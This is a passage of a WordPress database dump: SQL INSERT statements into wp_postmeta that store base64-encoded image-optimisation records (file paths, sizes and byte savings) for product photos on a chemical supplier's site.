MTZcLzA4XC9FUElLVVJFLVctMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLVctMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElLVVJFLVctMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjQwNiwidGltZSI6MTQ4MzU3NzA3NiwiaWQiOjEwNTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS1XLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS1XLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBJS1VSRS1XLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo0MzEsInRpbWUiOjE0ODM1NzcwNzksImlkIjoxMDU4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtVy01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtVy01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSUtVUkUtVy01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6NzIzLCJ0aW1lIjoxNDgzNTc3MDgzLCJpZCI6MTA1OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtVy0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtVy0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSUtVUkUtVy0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6NDc3LCJ0aW1lIjoxNDgzNTc3MDg2LCJpZCI6MTA1OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtVy0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtVy0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSUtVUkUtVy0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6NDU3LCJ0aW1lIjoxNDgzNTc3MDg5LCJpZCI6MTA1OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtVy0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtVy0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSUtVUkUtVy0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6NDk0LCJ0aW1lIjoxNDgzNTc3MDkzLCJpZCI6MTA1OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtVy0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtVy0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSUtVUkUtVy0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6NTgwLCJ0aW1lIjoxNDgzNTc3MDk2LCJpZCI6MTA1OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtVy0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtVy0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSUtVUkUtVy0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NTU4LCJ0aW1lIjoxNDgzNTc3MTAwLCJpZCI6MTA1OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtVy00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtVy00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSUtVUkUtVy00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6Nzk4LCJ0aW1lIjoxNDgzNTc3MTA0LCJpZCI6MTA1OH1d'); 
INSERT INTO `wp_postmeta` VALUES (29790, 1057, 'wpfc_optimisation_reduction', '129184'); 
INSERT INTO `wp_postmeta` VALUES (29791, 1057, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlMjM0LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlMjM0LmpwZyIsIndpZHRoIjo1MzIyLCJoZWlnaHQiOjM1NDgsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2UyMzQuanBnIiwicmVkdWN0aW9uIjoxMjkxNzAsInRpbWUiOjE0ODM1NzcxMTYsImlkIjoiMTA1NyJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlMjM0LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlMjM0LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlMjM0LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc3MTE4LCJpZCI6MTA1N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2UyMzQtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2UyMzQtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2UyMzQtODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzcxMjIsImlkIjoxMDU3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTIzNC03Njh4NTEyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTIzNC03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTIzNC03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NzEyNSwiaWQiOjEwNTd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlMjM0LTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTIzNC0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlMjM0LTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzcxMjksImlkIjoxMDU3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTIzNC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTIzNC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTIzNC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NzEzMiwiaWQiOjEwNTd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlMjM0LTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlMjM0LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlMjM0LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc3MTM1LCJpZCI6MTA1N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2UyMzQtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2UyMzQtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2UyMzQtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzcxMzcsImlkIjoxMDU3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTIzNC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTIzNC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTIzNC01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NzE0MCwiaWQiOjEwNTd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2UyMzQtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2UyMzQtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2UyMzQtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzcxNDMsImlkIjoxMDU3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlMjM0LTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlMjM0LTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlMjM0LTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc3MTQ2LCJpZCI6MTA1N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTIzNC0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTIzNC0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTIzNC0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NzE0OCwiaWQiOjEwNTd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2UyMzQtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2UyMzQtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2UyMzQtMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzcxNTEsImlkIjoxMDU3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlMjM0LTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlMjM0LTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlMjM0LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc3MTU0LCJpZCI6MTA1N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTIzNC00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTIzNC00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTIzNC00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NzE1NywiaWQiOjEwNTd9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29792, 1056, 'wpfc_optimisation_reduction', '19359'); 
INSERT INTO `wp_postmeta` VALUES (29793, 1056, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlMTU1LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlMTU1LmpwZyIsIndpZHRoIjo1NzYwLCJoZWlnaHQiOjM4NDAsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NzcxNjIsImlkIjoiMTA1NiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlMTU1LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlMTU1LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlMTU1LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo3NzIsInRpbWUiOjE0ODM1NzcxNjUsImlkIjoxMDU2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTE1NS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTE1NS04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvM